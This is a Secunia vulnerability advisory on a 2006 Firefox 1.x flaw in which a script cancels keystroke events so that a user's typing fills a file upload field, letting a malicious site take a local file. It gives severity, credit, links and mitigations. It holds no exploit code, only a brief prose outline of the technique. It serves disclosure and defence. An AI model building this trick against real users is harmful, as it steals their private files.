---------------------------------------------------------------------- Want to join the Secunia Security Team? Secunia offers a position as a security specialist, where your daily work involves reverse engineering of software and exploit code, auditing of source code, and analysis of vulnerability reports. http://secunia.com/secunia_security_specialist/ ---------------------------------------------------------------------- TITLE: Firefox File Upload Form Keystroke Event Cancel Vulnerability SECUNIA ADVISORY ID: SA20442 VERIFY ADVISORY: http://secunia.com/advisories/20442/ CRITICAL: Less critical IMPACT: Exposure of sensitive information WHERE: >From remote SOFTWARE: Mozilla Firefox 1.x http://secunia.com/product/4227/ DESCRIPTION: Charles McAuley has reported a vulnerability in Firefox, which can be exploited by malicious people to trick users into disclosing sensitive information. The vulnerability is caused due to a design error where a script can cancel certain keystroke events when entering text. This can be exploited to trick a user into typing a filename in a file upload input field by changing focus and cancel the "OnKeyPress" JavaScript event on certain characters. Successful exploitation allows an arbitrary file on the user's system to be uploaded to a malicious web site, but requires that the user types a text containing the characters of the filename. The vulnerability has been confirmed in version 1.5.0.4. Other versions may also be affected. SOLUTION: Disable JavaScript support. Do not enter suspicious text when visiting untrusted web sites. PROVIDED AND/OR DISCOVERED BY: Charles McAuley NOTE: A variant of this vulnerability was reported in a Mozilla Bugzilla bug entry back in year 2000. ORIGINAL ADVISORY: Charles McAuley: http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046610.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------